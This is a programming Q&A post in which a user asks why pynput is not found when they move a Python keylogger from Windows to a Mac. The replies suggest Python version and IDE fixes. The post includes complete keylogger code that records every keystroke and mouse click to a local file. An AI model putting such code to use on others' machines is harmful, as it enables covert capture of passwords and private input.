# Pynput not recognized for MacBook Air Keylogger

Tags: python, macos, keylogger, pynput

I designed a key logger on a windows computer, but when I moved it onto my personal mac, the code stopped working. Through pip install I have seemingly successfully downloaded pynput, but when I run the code I get the error message: Traceback (most recent call last):File "/Users/Ben/Desktop/CODE/key_logger.py", line 6, in 
    from pynput import keyboard
ModuleNotFoundError: No module named 'pynput'

```
keys = []

import threading
from threading import Thread

from pynput import keyboard

from pynput import mouse


def on_press(key):
    f = open('keylog.txt','a+')
    keys.append(key)
    f.write(str(key) + " ")
    yes = True
    f.close()

def on_click(x, y, button, pressed):
    f = open('keylog.txt','a+')
    keys.append(('{0} at {1}'.format('Pressed',(x,y))))
    f.write(str(('{0} at {1}'.format('Pressed',(x,y)))))
    f.close()


def func1():
    with keyboard.Listener(on_press = on_press) as listener:
        listener.join()

def func2():
    with mouse.Listener(on_click=on_click) as listener1:
        listener1.join()


if __name__ == '__main__':
    Thread(target=func1).start()
    Thread(target=func2).start()
```

Comment: What version of python are you using

Comment: I'm using Python 3.7

Comment: try running it with `python3 key_logger.py`

Answer (score 0):

If you are using VSC try it on another IDE as it can conflict sometimes with your already existing python. Also make sure you do not have more than one python where you've installed it for one but running the code with another